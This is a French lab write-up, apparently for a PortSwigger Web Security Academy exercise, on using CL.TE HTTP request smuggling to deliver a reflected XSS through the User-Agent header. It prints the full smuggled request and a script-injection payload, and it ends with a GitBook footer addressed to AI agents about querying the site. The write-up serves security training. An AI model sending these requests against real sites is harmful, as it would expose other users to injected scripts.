> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/request-smuggling/http-request-smuggling-to-deliver-reflected-xss.md).

# HTTP request smuggling pour diffuser un XSS réfléchi

### Exploiter la dissimulation de requêtes HTTP pour livrer un XSS réfléchi

Le laboratoire met en place un serveur front-end et un serveur back-end. / Le front-end **ne prend pas en charge le codage chunked**, ce qui ouvre la voie à une attaque de **dissimulation de requêtes HTTP**.

L'application présente également une vulnérabilité de **XSS réfléchi via l'en-tête User-Agent**.

L'objectif est de **envoyer une requête dissimulée** au back-end afin que **la prochaine requête de l'utilisateur victime reçoive une réponse contenant une charge utile XSS s'exécutant `alert(1)`**.

Le laboratoire génère périodiquement des requêtes pour le

### Vulnérabilité XSS dans User Agent

Le `userAgent` champ dans les formulaires est réutilisé directement dans la réponse, ce qui permet une injection :

<figure><img src="/files/b8f049ed45473c312a6c2914de3476a9f9194add" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```html
<input required type="hidden" name="userAgent" value="Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0">
```

{% endcode %}

Cette charge utile est acceptée et interprétée, confirmant la vulnérabilité XSS.

{% code overflow="wrap" %}

```html
"><script>alert(0)</script>
```

{% endcode %}

<figure><img src="/files/7c6063edc3adadc4805f538d4c76c2cbde807254" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eecb279af7bf61f89e3369168413467025fed83e" alt=""><figcaption></figcaption></figure>

### **Objectif de l'attaque**

L'idée est d'utiliser la dissimulation pour s'assurer que :

1. Le front-end lit la requête selon **Content-Length**.
2. Le back-end lit selon **Transfer-Encoding: chunked**.
3. La requête dissimulée modifie la requête suivante de l'utilisateur victime.
4. Le serveur renvoie ensuite une réponse contenant notre charge utile XSS dans l'en-tête User-Agent.

### **Requête d'application dissimulée**

Vous proposez une requête POST contenant un corps vide (`0/r/n/r/n`) pour terminer la partie chunked, suivie de la requête pour le back-end

```http
POST / HTTP/1.1
Host: 0a03007904861a418091d63e00800003.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Transfer-Encoding: chunked

0

GET /post?postId=6 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=tacWnPVGep8Me8A2MnkwA8hx5mrBU9la
User-Agent: "><script>alert(0)</script>
```

Cette seconde requête (dissimulée) sera interprétée par le back-end comme faisant partie de la requête suivante — celle de l'utilisateur victime — ce qui permettra d'injecter la charge utile XSS dans la réponse qu'il recevra.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/request-smuggling/http-request-smuggling-to-deliver-reflected-xss.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
